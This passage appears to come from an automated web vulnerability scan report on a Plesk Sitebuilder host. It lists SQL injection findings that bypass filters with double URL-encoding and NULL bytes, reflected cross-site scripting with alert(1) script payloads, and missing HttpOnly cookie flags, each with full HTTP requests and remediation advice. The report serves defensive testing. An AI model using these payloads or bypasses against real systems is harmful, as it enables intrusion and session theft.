.abmenu {
   font-size: 8pt;
   font-family: Tahoma, sans-serif;
   color: #4B4B4B;
   text-decoration: underline;
   font-weight: bold;
}

/*copyright*/
.footer { font-size: 8pt; font-family: Tahoma, sans-serif; color: #3F3F3F; }

/*backgrounds*/
.main-bg { background-color: #E1E1E1; }
.submenu-bg { background-color: #4E8BC1; }
.menu-hr { background-color: #6BA4CF; }
.line { background-color: #CACACA; }

1.6. http://vulnerarable.plesk.smb.10.2.0.site:2006/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/logo.gif [template parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:	/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/logo.gif

Issue detail

The template parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the template parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the template request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/logo.gif?template=personal-018%2527&colorScheme=green&header=headers1&button=buttons1 HTTP/1.1
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Proxy-Connection: keep-alive
Referer: http://vulnerarable.plesk.smb.10.2.0.site:2006/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/page1.php?1286688492090
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; locale=en-US; psaContext=domains; allowUnsupportedBrowser=yes; SessionID=23074cb14ecc5df3f; testCookie=test

Response 1

HTTP/1.1 500 Internal Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 06:07:49 GMT
Content-Length: 1208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>500 - Internal server error.</title>
<style type="text/css">

</style>
</head>
<body>
<div id="header"><h1>Server Error</h1></div>
<div id="content">
<div class="content-container"><fieldset>
<h2>500 - Internal server error.</h2>
<h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3>
</fieldset></div>
</div>
</body>
</html>

Request 2

GET /sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/logo.gif?template=personal-018%2527%2527&colorScheme=green&header=headers1&button=buttons1 HTTP/1.1
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Proxy-Connection: keep-alive
Referer: http://vulnerarable.plesk.smb.10.2.0.site:2006/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/page1.php?1286688492090
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; locale=en-US; psaContext=domains; allowUnsupportedBrowser=yes; SessionID=23074cb14ecc5df3f; testCookie=test

Response 2

HTTP/1.1 200 OK
Content-Type: image/gif
Last-Modified: Sun, 10 Oct 2010 06:07:53 GMT
Accept-Ranges: bytes
ETag: W/"80274794168cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 06:07:55 GMT
Content-Length: 2060

GIF89aL.8...............f..3..............f..3..............f..3....f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3..............f..3..............f..3..............f..3....f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3..............f..3..............f..3..............f..3....f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3...f..f..f..f.ff.3f..f..f..f..f.ff.3f..f..f..f..f.ff.3f..ff.ff.ff.fffff3ff.f3.f3.f3.f3ff33f3.f..f..f..f.ff.3f..3..3..3..3.f3.33..3..3..3..3.f3.33..3..3..3..3.f3.33..3f.3f.3f.3ff3f33f.33.33.33.33f33333.3..3..3..3.f3.33.............f..3..............f..3..............f..3....f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3.........H..K..M..S..W..Z..^.._..a..d..g..j..o..s..v..z...................................................................!.......,....L.8...... .H......*\......#J.H..E...A.x.#Bm..il......S.K...7....S.2..z...sX._?}.j^....?.P&......B+..vT........4.D.T....r.6z.......W......o.\}k.....-DsF.f3...>{...;....wG..#........[....m..a..m0Cs.2..'.]P.
.........4....]8.K......e.....m.].......P[>....g.-d.v..A.7........G.gv.........u..5..N.xm.`..o.yc.{[.3.7..g.:....u
q.N<.p..=..C!B...UZk...B..s_.......i.N<...a..D..y..C.>....B..#.....":..3.U(.uT6.%..=y!V...i3....#.90.....#......=....a...Y...y.9b.9.7..CO=.p..:...O[..3O....e7.T.g.~.w......y...6....A....<....7.......u.....#N.2..Tg....r...^C..Si...."=.....K..`6d....&.s*\....:..3dA....>.dsR.....[n...;...N...:+...S.:...?w2...Y.SVA.../;..JR9....8nqC......q......|jP7......mS...|;......<...... I^:,.S..f..N;..C.@....O.:DNj....._.i.9HW......0A......eC.C......u..9...vB....N..HJ.6.LM.>O.....z..9..3.8{...;....@...TmT...9&5N..>3.8...3A....<P...O....D.........6..c|8...<N..SA..C.h..S9C.P\.9.\..7....@.8....L/.?.J...H.=...tc.8...^9..S.@...h.R....k...8.q.......W..c;k..(.x[t..@...u>..9....i.....A.q....(...6.!.p|...``A(...iC..R....A.7.....YE...:...#G....,.#l, .X...n<...C.....s.........v.......!..m.#<.9!?...w\...X.W..@e.cs...:..3m../.A.>"..zT.+..F.f.$....).k.d.#......J..1.Y.f...7`..y....._J.....C..zH.DC....f.X.;.q........1?.. ..g&9.4....A..^..6.I.r....L.9...;

1.7. http://vulnerarable.plesk.smb.10.2.0.site:2006/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/xsk_16.jpg [colorScheme parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:	/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/xsk_16.jpg

Issue detail

The colorScheme parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the colorScheme parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/xsk_16.jpg?template=personal-018&colorScheme=green%00'&header=headers1&button=buttons1 HTTP/1.1
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Proxy-Connection: keep-alive
Referer: http://vulnerarable.plesk.smb.10.2.0.site:2006/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/page1.php?1286688492090
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; locale=en-US; psaContext=domains; allowUnsupportedBrowser=yes; SessionID=23074cb14ecc5df3f; testCookie=test

Response 1 (redirected)

HTTP/1.1 403 Forbidden
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: SessionID=23074cb14ecc5df3f; path=/
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 06:11:50 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>403 - Forbidden: Access is denied.</title>
<style type="text/css">

</style>
</head>
<body>
<div id="header"><h1>Server Error</h1></div>
<div id="content">
<div class="content-container"><fieldset>
<h2>403 - Forbidden: Access is denied.</h2>
<h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3>
</fieldset></div>
</div>
</body>
</html>
<h1>403 - Forbidden</h1>

Request 2

GET /sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/xsk_16.jpg?template=personal-018&colorScheme=green%00''&header=headers1&button=buttons1 HTTP/1.1
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Proxy-Connection: keep-alive
Referer: http://vulnerarable.plesk.smb.10.2.0.site:2006/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/page1.php?1286688492090
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; locale=en-US; psaContext=domains; allowUnsupportedBrowser=yes; SessionID=23074cb14ecc5df3f; testCookie=test

Response 2

HTTP/1.1 200 OK
Content-Type: image/jpeg
Last-Modified: Sun, 10 Oct 2010 06:11:53 GMT
Accept-Ranges: bytes
ETag: "801a8184268cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 06:11:56 GMT
Content-Length: 621

......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................

...................... .. . ........................................................................g................... .............................................!.1AQq2#...."$.....................!............?....V.E_...$.....
d}..v.(...|....#.s~..!Z..R..E+."F...m.Z.@....3.........J..].`J...... ..%....0.H..*L, ....%.{.h....s.......LV.]_.O.d.]..l.T6g.C...%......3R"...!......KV
'\.../b...[..|%dz......+,=...mq.A.(.8.D........1p.....?-..iq..$...\.K.:E....;..x&J;.yE..u.....<].jDu.l8.#.....@N;p.8...?..

2. Cross-site scripting (reflected) previous next
There are 3 instances of this issue:

/Wizard/Edit/Modules/Image [file parameter]
/Wizard/Edit/Modules/Image [name of an arbitrarily supplied request parameter]
/localizedimage.php [name of an arbitrarily supplied request parameter]

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

2.1. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Modules/Image [file parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:	/Wizard/Edit/Modules/Image

Issue detail

The value of the file request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 115d3"><script>alert(1)</script>6ce2f3d0fa8 was submitted in the file parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Wizard/Edit/Modules/Image?file=data/storage/attachments/276e6d26f703339c19673c83a6febf28.jpg115d3"><script>alert(1)</script>6ce2f3d0fa8 HTTP/1.1
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Modules/ImageGallery
Cookie: PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; do-not-show-getting-started-popup=true; SessionID=42b54cb11fc3aedbd; sessionID=ratyxspkfhncnbudbnjoxfoj; show-getting-started-popup=true; locale=en-US; PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; testCookie=test; psaContext=domains; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; user=187d997e8ea6a5d0f56792f7f9ba70a4;

Response

2.2. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Modules/Image [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:	/Wizard/Edit/Modules/Image

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd206"><script>alert(1)</script>9d144815d58 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Wizard/Edit/Modules/Image?file=data/storage/attachments/276e6d26f703339c19673c83a6febf28.jpg&dd206"><script>alert(1)</script>9d144815d58=1 HTTP/1.1
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Modules/ImageGallery
Cookie: PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; do-not-show-getting-started-popup=true; SessionID=42b54cb11fc3aedbd; sessionID=ratyxspkfhncnbudbnjoxfoj; show-getting-started-popup=true; locale=en-US; PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; testCookie=test; psaContext=domains; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; user=187d997e8ea6a5d0f56792f7f9ba70a4;

Response

2.3. http://vulnerarable.plesk.smb.10.2.0.site:2006/localizedimage.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:	/localizedimage.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b7b4"><script>alert(1)</script>eb263b2f76a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /localizedimage.php?3b7b4"><script>alert(1)</script>eb263b2f76a=1 HTTP/1.1
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; do-not-show-getting-started-popup=true; SessionID=42b54cb11fc3aedbd; sessionID=ratyxspkfhncnbudbnjoxfoj; show-getting-started-popup=true; locale=en-US; PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; testCookie=test; psaContext=domains; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; user=187d997e8ea6a5d0f56792f7f9ba70a4;

Response

3. Cookie without HttpOnly flag set previous next
There are 37 instances of this issue:

/
/Login
/NoCookies
/UnsupportedBrowser
/Wizard/
/Wizard/Design
/Wizard/Edit
/Wizard/Edit/
/Wizard/Edit/Html
/Wizard/Edit/Modules/Image
/Wizard/Edit/Modules/ImageGallery
/Wizard/Edit/Modules/ImageGallery/
/Wizard/Edit/Modules/ImageGallery/Category/Add
/Wizard/Edit/Modules/ImageGallery/Category/Edit
/Wizard/Edit/Modules/ImageGallery/Image/Edit
/Wizard/Edit/Modules/ImageGallery/ImageUpload
/Wizard/Edit/Modules/ImageGallery/MultiImagesUpload
/Wizard/Overview
/Wizard/Pages
/Wizard/Publish
/Wizard/Start
/custom/
/external_login.php
/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/bullet.gif
/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/header.jpg
/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/hleft.jpg
/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/htop.jpg
/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/spacer.gif
/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/xsk_02.jpg
/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/xsk_06.jpg
/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/xsk_10.jpg
/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/xsk_13.jpg
/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/xsk_19.jpg
/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/xsk_22.jpg
/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/xsk_23.jpg
/wysiwyg/custom/skins/default/images/toolbar.buttonarrow.gif
/wysiwyg/custom/skins/default/images/toolbar.start.gif

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

3.1. http://vulnerarable.plesk.smb.10.2.0.site:2006/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SessionID=42b54cb11fc3aedbd; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; do-not-show-getting-started-popup=true; SessionID=42b54cb11fc3aedbd; sessionID=ratyxspkfhncnbudbnjoxfoj; show-getting-started-popup=true; locale=en-US; PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; testCookie=test; psaContext=domains; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; user=187d997e8ea6a5d0f56792f7f9ba70a4;

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: /Login
Server: Microsoft-IIS/7.5
Set-Cookie: SessionID=42b54cb11fc3aedbd; path=/
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 06:07:17 GMT
Connection: close

3.2. http://vulnerarable.plesk.smb.10.2.0.site:2006/Login previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:	/Login

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SessionID=42b54cb11fc3aedbd; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Login?returnUrl=%2Fwysiwyg%2Fcustom%2Fskins%2Fdefault%2Fimages%2Ftoolbar.buttonarrow.gif HTTP/1.1
Accept: */*
Referer: http://vulnerarable.plesk.smb.10.2.0.site:2006/wysiwyg/custom/fckeditor.wizard.html?cacheId=5.0.0.2009110318&currentPageId=q485ez4jvyq&editFilePath=/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/page1.php&InstanceName=wysiwyg&Toolbar=wizard
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Proxy-Connection: Keep-Alive
Cookie: PHPSESSID=10321169792bce25daa15603ea9ba645; sessionID=ratyxspkfhncnbudbnjoxfoj; PLESKSESSID=10321169792bce25daa15603ea9ba645; locale=en-US; SessionID=42b54cb11fc3aedbd; psaContext=dashboard; testCookie=test

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: SessionID=42b54cb11fc3aedbd; path=/
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 02:09:37 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>403 - Forbidden: Access is denied.</title>
<style type="text/css">

</style>
</head>
<body>
<div id="header"><h1>Server Error</h1></div>
<div id="content">
<div class="content-container"><fieldset>
<h2>403 - Forbidden: Access is denied.</h2>
<h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3>
</fieldset></div>
</div>
</body>
</html>
<h1>403 - Forbidden</h1>

3.3. http://vulnerarable.plesk.smb.10.2.0.site:2006/NoCookies previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:	/NoCookies

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SessionID=42b54cb11fc3aedbd; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /NoCookies HTTP/1.1
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Html?currentPageId=q485ez4jvyq
Cookie: PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; do-not-show-getting-started-popup=true; SessionID=42b54cb11fc3aedbd; sessionID=ratyxspkfhncnbudbnjoxfoj; show-getting-started-popup=true; locale=en-US; PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; testCookie=test; psaContext=domains; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; user=187d997e8ea6a5d0f56792f7f9ba70a4;

Response

3.4. http://vulnerarable.plesk.smb.10.2.0.site:2006/UnsupportedBrowser previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:	/UnsupportedBrowser

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SessionID=23074cb14ecc5df3f; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /UnsupportedBrowser?returnUrl=%2FWizard%2FEdit%2FHtml%3FcurrentPageId%3Dq485ez4jvyq HTTP/1.1
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Proxy-Connection: keep-alive
Referer: http://vulnerarable.plesk.smb.10.2.0.site:8880/domains/sitebuilder_edit.php?dom_id=1
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: psaContext=domains; PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; locale=en-US; SessionID=23074cb14ecc5df3f

Response

3.5. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:	/Wizard/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SessionID=42b54cb11fc3aedbd; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Wizard/ HTTP/1.1
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; do-not-show-getting-started-popup=true; SessionID=42b54cb11fc3aedbd; sessionID=ratyxspkfhncnbudbnjoxfoj; show-getting-started-popup=true; locale=en-US; PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; testCookie=test; psaContext=domains; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; user=187d997e8ea6a5d0f56792f7f9ba70a4;

Response

3.6. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Design previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:	/Wizard/Design

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SessionID=42b54cb11fc3aedbd; path=/

